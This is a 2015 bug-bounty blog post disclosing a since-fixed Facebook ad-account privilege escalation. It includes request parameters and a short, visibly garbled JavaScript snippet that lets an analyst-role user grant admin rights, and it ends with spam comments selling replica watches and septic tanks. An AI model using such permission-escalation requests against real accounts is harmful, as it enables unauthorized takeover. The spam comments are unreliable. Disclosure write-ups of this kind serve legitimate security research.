Sunday, March 15, 2015

Bypass ad account roles vulnerability 2015


facebook exploit 2015

I discovered a vulnerability in Facebook that allowed a normal user in ad account to get unauthorized admin access in that ad account

admins in ad account  can add any user to their ad account with these 3 type of  role :

  1. admin
  2. advertiser
  3. analyst
read more about these roles link

Facebook launched business manager in 2014 to help businesses and agencies manage their Facebook Pages , that can be accessible from

in Facebook business manager, a business account can assign agencies for own ad accounts
so that agencies give access to ad accounts with limited access(owner set this access in assign agency process)

the vulnerability that I found, allow these agencies with normal role(2,3)  change their own access to admin!

Scenario :

I have business account and I give analyst permission to another business account to work on my ad account!
that business account can bypass roles and get admin access!


with analyst permission in any ad account send this request :

request url :

request body :

act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission : 1001 admin, 1002 advertiser, 1003 analyst ]

Exploit :

var Xhr;
Xhr = new XMLHttpRequest ();"POST","/ads/manage/settings/permissions/?action=add_user",true);
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
p += "fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;
__ACCID__ = ad account id
__USERID__ = this user will be new admin ;)
__PERM__ = permission (1001,1002,1003)

POC : 

 I removed some section that used userid or email


  •  Mar 14, 2015 01:27am: Initial report
  •  Mar 17, 2015 03:35am: Bug acknowledged by security team
  •  Mar 17, 2015 08:00am: Security team member Reginaldo informed me the vulnerability fixed
  •  Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with a $8000.


  1. Replies
    1. Hello It’s really a nice and helpful piece of info. I am happy that you shared this helpful info with us. Please stay us informed like this. Thank you for sharing. bye
      Tangki Panel
      Tangki Fiberglass
      Jual Septic Tank

  2. Ich kaufte eine Kopie dieser Uhr für meinen Freund in diesem Online-Shop. Mein Freund liebt es. Er rühmte sich, dass diese Uhr fantastisch ist.
    luxury copy watches
    luxury watches
    copy watches

  3. Ik gebruik dit replica horloge is een zeer mooi en betaalbaar automatisch horloge, goede maat, Winkel voor luxe horlogeshoge kwaliteit,replica breitling horloges elegant en temperament, het is mijn favoriete stijl. Ik heb deze site gedeeld met mijn vrienden en ze waren erg blij.

  4. I bought a copy of this watch for my friend at this online store. perfect replica watches My friend likes it. replica breitling bentley watches The clock is very punctual, the style is very new, the version is very positive, the original and the original are no different, I like it very much.